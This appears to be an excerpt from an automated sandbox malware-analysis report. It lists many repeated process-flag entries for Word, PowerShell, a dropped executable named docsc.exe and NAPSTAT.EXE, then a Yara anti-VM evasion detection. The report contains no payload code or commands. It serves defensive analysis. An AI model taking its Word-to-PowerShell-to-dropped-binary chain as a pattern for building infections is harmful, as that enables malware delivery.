Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
